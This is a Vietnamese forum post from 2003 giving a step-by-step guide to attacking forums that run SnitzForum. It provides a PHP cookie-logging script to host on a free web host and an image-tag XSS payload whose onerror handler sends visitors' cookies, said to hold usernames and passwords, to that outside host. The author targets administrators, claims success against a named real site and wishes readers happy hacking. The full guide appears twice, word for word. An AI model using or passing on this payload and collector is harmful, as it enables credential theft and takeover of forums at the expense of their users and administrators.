anhyeuemnhieudl
25-09-2003, 23:48
SnitzForum có một lỗi khiến cho hacker có thể chạy được JavaScript để lấy cookie. Trong cookie này chứa username và password. Nếu ta lấy được username/pass của admin thì có thể kiểm soát được hoàn toàn forum đó. Sau đây là các bước để hack các diễn đàn dùng SnitzForum
1. Thu thập thông tin: tìm hiểu xem admin ở đó là ai, những chủ đề gần nhất mà hắn đã tham gia
2. Đăng kí 1 free host có hỗ trợ PHP, ví dụ như http://www.f2s.com/, nếu có rồi thì thôi
3. Soạn thảo và upload 1 file có nội dung như sau (trong bài này đặt tên là page.cgi):
#!/usr/bin/php
<?php
$fp = fopen("mycookie.txt","a+");
fputs($fp,$test . "\n");
readfile("mypic.gif");
?>
4. upload một file ảnh hợp lệ nào đó (trong bài này là mypic.gif) lên cùng thư mục với page.cgi. File ảnh này dùng để trả về sau khi script chạy. Nên dùng ảnh nào có kích thước càng nhỏ càng tốt, ví dụ 1x1 pixel chẳng hạn.
5. Gửi vào các chủ đề mà admin tham gia nội dung sau:
...... any thing you want
(img)http://www.yourpage.f2s.com"onerror="this.src=src+'page.cgi?test='+escape(document.cook ie);(/img)
6. Bất kì ai vào đọc topic đó sẽ bị chôm cookie. Các bạn chỉ việc ngồi đợi, khỏi phải làm gì hết. Muốn xem kết quả thì chỉ việc mở file mycookie.txt ở cùng thư mục với file page.cgi là xong.
Kĩ thuật này có thể áp dụng vào SnitzForum bản mới nhất. Đã thử thành công với TTVNOnline (www.ttvnonline.com). Tuy nhiên tôi đã báo với admin ở đó nên hiện nay TTVNOnline đã mã hoá username/pass, tuy nhiên vẫn có thể phá được.
Chúc các bạn hack thành công, nhưng đừng có quậy phá quá đấy nhé.
:twisted: 8-)
1. Thu thập thông tin: tìm hiểu xem admin ở đó là ai, những chủ đề gần nhất mà hắn đã tham gia
2. Đăng kí 1 free host có hỗ trợ PHP, ví dụ như http://www.f2s.com/, nếu có rồi thì thôi
3. Soạn thảo và upload 1 file có nội dung như sau (trong bài này đặt tên là page.cgi):
#!/usr/bin/php
<?php
$fp = fopen("mycookie.txt","a+");
fputs($fp,$test . "\n");
readfile("mypic.gif");
?>
4. upload một file ảnh hợp lệ nào đó (trong bài này là mypic.gif) lên cùng thư mục với page.cgi. File ảnh này dùng để trả về sau khi script chạy. Nên dùng ảnh nào có kích thước càng nhỏ càng tốt, ví dụ 1x1 pixel chẳng hạn.
5. Gửi vào các chủ đề mà admin tham gia nội dung sau:
...... any thing you want
(img)http://www.yourpage.f2s.com"onerror="this.src=src+'page.cgi?test='+escape(document.cook ie);(/img)
6. Bất kì ai vào đọc topic đó sẽ bị chôm cookie. Các bạn chỉ việc ngồi đợi, khỏi phải làm gì hết. Muốn xem kết quả thì chỉ việc mở file mycookie.txt ở cùng thư mục với file page.cgi là xong.
Kĩ thuật này có thể áp dụng vào SnitzForum bản mới nhất. Đã thử thành công với TTVNOnline (www.ttvnonline.com). Tuy nhiên tôi đã báo với admin ở đó nên hiện nay TTVNOnline đã mã hoá username/pass, tuy nhiên vẫn có thể phá được.
Chúc các bạn hack thành công, nhưng đừng có quậy phá quá đấy nhé.
:twisted: 8-)